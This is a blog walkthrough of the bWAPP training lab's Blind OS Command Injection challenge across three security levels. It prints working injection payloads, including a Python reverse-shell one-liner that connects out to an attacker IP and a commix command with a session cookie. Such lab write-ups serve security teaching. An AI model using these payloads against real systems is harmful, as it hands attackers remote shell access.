In this walk through, we will be going through the OS Command Injection (Blind) vulnerability section from bWAPP Labs. We will be exploring and exploiting Blind OS Command Injection in DNS Lookup functionality and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
Security: Low
- Setting the security level to Low.
- The application has a command box which is used to ping an ip address. On intercepting the request via Burpsuite, we can see that it is using POST request with our supplied parameter to commandi_blind.php file. As this is a Blind OS command injection challenge we will not getting any output.
- I used the below payload to test the Blind command injection and it worked. The application got hanged for 5 seconds as per our supplied input.
127.0.0.1 | sleep 5
- Let’s exploit the server and get a reverse shell using the below payload.
127.0.0.1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.81",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Security: Medium
- Setting the security level to Medium.
- I used the same payload to test the Blind command injection and it worked. The application got hanged for 5 seconds as per our supplied input.
127.0.0.1 | sleep 5
- I used various payloads however was unable to get the reverse shell manually. So, i used commix and it worked.
python3 commix.py -u "http://localhost/commandi_blind.php" --cookie="PHPSESSID=k6h767b8c040u52pi5hc0ilai1; security_level=1" --data="target=127.0.0.1&form=submit"
Security: High
- Setting the security level to High.
- I used the below payload however none of them worked. So, i tried exploitation with commix and it did not worked too.
127.0.0.1 ; sleep 5 127.0.0.1 & sleep 5 127.0.0.1 | sleep 5 127.0.0.1 || sleep 5 127.0.0.1 && sleep 5
Also Read: bWAPP – Old, Backup & Unreferenced files
Conclusion:
So, we finally completed all the security levels for the bWAPP OS Command Injection (Blind) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Blind OS Command Injection attacks can be mitigated by completely avoiding OS commands from application-layer code and performing input sanitization on the user input where necessary. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.